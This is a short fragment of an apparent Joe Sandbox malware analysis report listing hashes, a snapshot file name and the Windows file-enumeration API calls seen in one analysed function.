                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: fca1d213eff81ed32e380a21bded36aeff28f31946e1903f3ed526f78222a61e
                      • Instruction ID: 1500679400db68c8dd672c45adda460ac52d12208f84ba754f6ec4efd93b8f0e
                      • Opcode Fuzzy Hash: fca1d213eff81ed32e380a21bded36aeff28f31946e1903f3ed526f78222a61e
                      • Instruction Fuzzy Hash: 3321B8B690020467C794FBB0DC46EED733DAB95300F00495FB65A92191EF78AAC9CF96